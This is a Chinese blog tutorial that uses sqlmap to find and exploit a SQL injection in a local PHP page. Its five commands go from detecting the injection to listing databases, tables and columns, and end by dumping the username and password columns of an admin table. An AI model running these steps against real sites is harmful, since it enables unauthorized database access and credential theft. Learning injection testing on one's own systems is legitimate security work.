您的位置 首页 php

Web安全渗透测试之SQLmap注入mysql实战

智云科技发布于 2022年5月16日评论关闭阅读(416)

SQLmap 是一款用来检测与利用SQL注入漏洞的免费开源工具,在注入工具方面,一个sqlmap就足够用了,只要你能用的熟,它可以秒杀各种工具。并且它还可以跨平台使用,棒极了!

f4e0a8d1734e46b082bec391f7465d42

1.判断是否存在注入 

sqlmap -u 127.0.0.1/show.php?newsid=4
5a191faacff6423c8ebf5b336431750b

存在注入

2.获取当前数据库 

sqlmap -u 127.0.0.1/show.php?newsid=4 --dbs
67a3fe2d3ca84e0b852ccfdddbb8ac66

3. 获取数据库admin下表名 

sqlmap -u 127.0.0.1/show.php?newsid=4 -D admin --tables
41badd35a51e46519450e22641a64bb2

4.获取数据库hfgx_new下pcms_admin的列名 

sqlmap -u 127.0.0.1/show.php?newsid=4 -D admin -T pcms_admin --columns

扫描出pcms_admin下有 username password列名

6a079c08269f4f3ebc438adcadcfbde1

5.获取内容 

sqlmap -u 127.0.0.1/show.php?newsid=4 -D admin -T pcms_admin -C "username,password" --dump
c7c217df28de4d8fb5dfaa799ec322a5

喜欢黑客技术的话可以关注我

每天都会有相应的教程发布,

谢谢大家

标签:
打赏 点赞(0)

文章来源:智云一二三科技

文章标题:Web安全渗透测试之SQLmap注入mysql实战

文章地址:https://www.zhihuclub.com/33869.shtml

关于作者: 智云科技

相关文章

热门文章

1分享新浪图床上传接口源码

点赞(890)阅读(59,454)

2PHP简单实现路由Route功能

点赞(1.11K)阅读(35,937)

3Tideways、xhprof 和 xhgui 打造 PHP 非侵入式监控平台

点赞(316)阅读(4,272)

4centos系统如何查看是否安装了mysql

点赞(491)阅读(3,752)

5curl 工具简述

点赞(461)阅读(2,958)
网站地图